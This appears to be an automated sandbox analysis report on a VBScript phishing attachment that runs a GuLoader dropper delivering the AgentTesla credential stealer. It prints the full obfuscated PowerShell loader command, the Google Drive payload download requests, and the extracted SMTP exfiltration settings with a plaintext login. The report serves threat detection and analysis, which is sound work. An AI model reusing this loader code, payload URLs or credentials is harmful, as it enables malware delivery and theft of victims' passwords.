Windows Analysis Report
Swift_Message#1234323456.vbs

Overview

General Information

Sample name:Swift_Message#1234323456.vbs
Analysis ID:1430117
MD5:78a3e500aa75424e4494cc24d8d2b1f3
SHA1:99b288b4dc02152cedcedd4f40752d55696f8eb1
SHA256:24220410bffece94d6ad483d61e540ee6b0fcc2d9be690d3b03d4b2b37ba07cb
Tags:vbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6452 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. 
ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. 
');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$naboiO,onprvQuenteB,llerRedfirDrouge ChamaHjem c redhNedlg1Tvist6Physo1Hespe)Taleg ');Multikunsts (Phenolsulphonate 'Multi$ BogpgMahoglForudounsolbYmpnia,angblSynta:ernriT ,esueAddergfy kllAn ipvA bitrLamelkNummesHeatea.agterNum.rbButyreOverfjCurvid ImmueInimisUnidi=C ris$HomosU ForhnC ondb LivsaU.nacpGnis t Vil,iSm.llsEklateunbra.Cu sosSquilpUdflylDrowniOppilthypoc(Vider$k.nceP Der,oHalfll Do ee LarymTr thi Fde.sectroeLand,rFondsef,sibsFabri)Diskk ');$Unbaptise=$Teglvrksarbejdes[0];Multikunsts (Phenolsulphonate 'Bruge$Reg,lgD.ouglIllegoqueneb mustaSo.welUni,t:blankH OrgavAccule StetdSiddeeSti umGavageIntimlBloms= seneNMag.seArbejwKo ce-SplitOApostb.aratjNonnae ayercInfo tDudel A,tomSFerieyBrus s ,asttM,croe ektm K,rs.DomstN LovpeGur dtRentr.FodboWStrope abonb SmilC,utoklNecroiDe oreH,mannFjerptsamme ');Multikunsts (Phenolsulphonate 'Emp.t$ PrimHImpervInfleeSkaerdUhv seFactumKi gheGrns.lBenyt.T iolHpr.deeNybega Selvd Impoe Sjo.rAntissCo se[ Disk$Rigi.DAren.i affegIridotWor he,eutrr NyheiScutisWorkwkRingleElect]Rando=Tempe$Nit,hHun,inyDimpsdMarihrBottooNytthrChr shS,akki addezstaalaFrste ');$Trichomatosis=Phenolsulphonate ' RadiHInstrvDemulePreexdTolueeFe lvmUnra.ePrimalUdsen.C.untD Tw,noMuddyw ovanSiam.lPertioFlydeastrmkdT.abeFPictuiPatrolLan.beBetyd(Tandp$PlougUFerlinOpbygb OssiaRallypUdtr.t GiviiFlabesUndepe Pist,Dyrep$ReforSLoftekVin srkmperd dr.wdor alePeskyr apo.eTraadrFilteeArresnSans,dEnrinet,anssCardi) Fi,k 
';$Trichomatosis=$funktionstegningens[1]+$Trichomatosis;$Skrddererendes=$funktionstegningens[0];Multikunsts (Phenolsulphonate ' Klud$ProdugSmeltlReovioEpanobUnpreaToteml rum: ugenhElocuefotogl D spi fteu M,utmVurdeeBurthtBladds D kn= Leje( urisTHeelle.etrasKontitD.tin-Fort,PPreveaherret Dellh,rger A ros$RefleSPlastkovinerDiverdrumbud DowcePretrrBev deS ammrFor.ue forknKristdRegleeKommusDupsk)omstn ');while (!$heliumets) {Multikunsts (Phenolsulphonate 'Vager$Anbrig .ewilBilraoOrmazb lukaAllerl .ndi:KetupE demonlitzdvVanadeDyr hjKabins D agkTrenco HellmRech.mHa esu,eedinBjergi Uni,kSupera rypttSol niFlaado,igmenVedheeHyfeunO inesHager=Disen$EksamtG.melr Sekvusign.e pneu ') ;Multikunsts $Trichomatosis;Multikunsts (Phenolsulphonate 'MiscoSPoroct S.ssaLophorflyvetCalyc-PrescS P.eslBeslue.kelleProvspProvi Spal.4Hv.sk ');Multikunsts (Phenolsulphonate 'Syne.$premogN.taal uttoo TrimbKnobuaProfel Kryd:HmosthNonpeeSeatwlIken,iH ldbuStyptmOut.leL kertOvertsUnch.= Disl(TrombTSpr neZoothsCoop t.enna-FrustPPrustaSo rctFiksehVrigh Radio$ArendSBin,mkTrff rhumhudBoatsdFingee,orskrHost,eReadirFors,ePlatonTor,tdUnfureBathys Japo)Strep ') ;Multikunsts (Phenolsulphonate 'Frema$DiphegAge dlJustioIsophbGenina SniplMassa: Lo,aI epefnBroadtTer.orjonosaChromnEffers TrypiPinkitKompei wa.nvboot.ebromilOpslay Fesc=Arnfr$TraskgStranl lesio Han,bAttesa Lua lDogtr:ForbrF.avnea bad.sEpicetPetarlNucleg unstg,irmaehellelKolonsThiopeGlubhrM.ttenLi laeJubbesSladr+excus+ So,s%Stenc$UnburTThickeKrig gScavelB ssevAgterrOsprekP.antsV rieaI oburUnsupbAnodieTan,sj .imed Omste Rek,sKirke.LagtecLoxodoLeptiuAdvecn Acyltre,ol ') ;$Unbaptise=$Teglvrksarbejdes[$Intransitively];}Multikunsts (Phenolsulphonate 'Boot.$ ArkigAnalylClamaoPetrob DragaattaclRegen:KonjuRGadekePresie S.olvundubiTongmdBra.ceS.cernLjertc demoeFilmk .bre= Spo, kerygG ha.ieFrosttWilli-KopisC Systo NonenPrfertKorpueThrean log,tLacew Sper.$ ArgySDe.takov.rprSkjoldPounddKa ege rapr FyreeKon.rrTo deeDuodrnBl dgdMotioeDelins Snug ');Multikunsts 
(Phenolsulphonate 'Coppe$.illeg ShamlS.ampo.sksnbM skiaFu igldefen:Tr,inACowpadHoc,er,tovteTillgnMyoloaUnautl,ampeeLydincBalant.topfo CentmOu ruyOvert Spumo=Marke Null[Srg dSFabuly noggsUdefrtDromeePr,apmUnfra.ScreeCSl,beoAlantnA canvUfremeMus.irReacktCandy]Areol:Vanro:de.ilFSkovmrFrodio,roatmUv.nnBPern.a B,ozsSubeleInter6 krmm4.eviaSPos,mtp.etirKnlfti,ertin M tagT lla( B mb$ MonoRAdganeEditaeAftrrvUnproiIndgidIntereeksponUn.ercTapwoeNeo o)Arun, ');Multikunsts (Phenolsulphonate ' Opdi$RattogSme,glhidsio Ldreb Sp daForcel Arbo:dualiD RebeyOestrrS traeLandbpH,anda.nthrrNeo,hkNatioeAurelnSky,d Neu.=Fa,at Infer[AngelSSuperyUnpursCropptHumpleVi.kemautoi.AutocTHorseeKontox BundtAf ek.SpyttESvmmenMyriccDeu,eoDybdedCho.di Wiren kavag Vitt]athir:Regns: offeALuannSEncykCUlt.aIsequeICoxit.Kit.yGSpoereNr.sttN.neqSAfluktFl.ntrCleidi CiganPu itg kreo(Quill$Ekse Aknibtd ElekrAlisoePosttnRekreaTranslIndkoeUdskac FjodtPlan,oC lqum Mo ayVelvi)Skrat ');Multikunsts (Phenolsulphonate 'Ante.$.eatlgStrailadmo.oTran,bR,sula Sal lKostu:,orteR CavauVgav tNs.ebtRecgee aduldBonde1,urit7 Zion2Hgted= dmin$BltedDKbes.yUncomrSu.akehighbpScutkaPseudr ,avokGle.me,eotrn Opsl.So,acs,priluTunnebTernssSlvrvtInsusr Bul.i kulnBrgedgFarmb(Posit2Skuff9 Impl4Bello9 Hils2Edwar8Naomi,Amman2 Dors6neddy9 hakk8Jeopa7 ono)Pross ');Multikunsts $Rutted172;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5336 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3428 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument omitted; see PID 416 above] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5684 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5808 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.privateemail.com", "Username": "sharon.milton@dasaultfalconjet.com", "Password": "Nigeria@123"}
Source | Rule | Description | Author | Strings
0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000005.00000002.2685556300.0000000008A50000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000000B.00000002.3626677690.0000000021FAC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

            Source | Rule | Description | Author | Strings
            amsi64_416.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (strings listed below)
            • 0x102fa:$b2: ::FromBase64String(
            • 0xd676:$s1: -join
            • 0x6e22:$s4: +=
            • 0x6ee4:$s4: +=
            • 0xb10b:$s4: +=
            • 0xd228:$s4: +=
            • 0xd512:$s4: +=
            • 0xd658:$s4: +=
            • 0xf8a5:$s4: +=
            • 0xf925:$s4: +=
            • 0xf9eb:$s4: +=
            • 0xfa6b:$s4: +=
            • 0xfc41:$s4: +=
            • 0xfcc5:$s4: +=
            • 0xdd8e:$e4: Get-WmiObject
            • 0xdf7d:$e4: Get-Process
            • 0xdfd5:$e4: Start-Process
            amsi32_3428.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (strings listed below)
            • 0x10247:$b2: ::FromBase64String(
            • 0xd676:$s1: -join
            • 0x6e22:$s4: +=
            • 0x6ee4:$s4: +=
            • 0xb10b:$s4: +=
            • 0xd228:$s4: +=
            • 0xd512:$s4: +=
            • 0xd658:$s4: +=
            • 0xf8a5:$s4: +=
            • 0xf925:$s4: +=
            • 0xf9eb:$s4: +=
            • 0xfa6b:$s4: +=
            • 0xfc41:$s4: +=
            • 0xfcc5:$s4: +=
            • 0xdd8e:$e4: Get-WmiObject
            • 0xdf7d:$e4: Get-Process
            • 0xdfd5:$e4: Start-Process
            • 0x175a5:$e4: Get-Process

            System Summary

            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs", ProcessId: 6452, ProcessName: wscript.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 66.29.159.53, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 5808, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49726
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs", ProcessId: 6452, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument omitted; see PID 416 in the process tree above]
            No Snort rule has matched

            AV Detection

            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: powershell.exe.3428.5.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.privateemail.com", "Username": "sharon.milton@dasaultfalconjet.com", "Password": "Nigeria@123"}
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24C803E0 CryptUnprotectData,11_2_24C803E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24C80A0B CryptUnprotectData,11_2_24C80A0B
            Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.6:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.6:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49725 version: TLS 1.2
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb| source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2679909580.000000000776C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb>vkv source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 00000005.00000002.2679909580.00000000077AD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb' source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32 source: powershell.exe, 00000005.00000002.2679909580.00000000077AD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2673226502.0000000003340000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficTCP traffic: 192.168.2.6:49726 -> 66.29.159.53:587
            Source: Joe Sandbox ViewIP Address: 66.29.159.53 66.29.159.53
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknown HTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49715 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.6:49716 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49723 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.6:49724 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49725 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Window created: window name: CLIPBRDWNDCLASS

            System Summary

            Source: amsi64_416.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_3428.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 416, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3428, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7716
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7716
            Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr 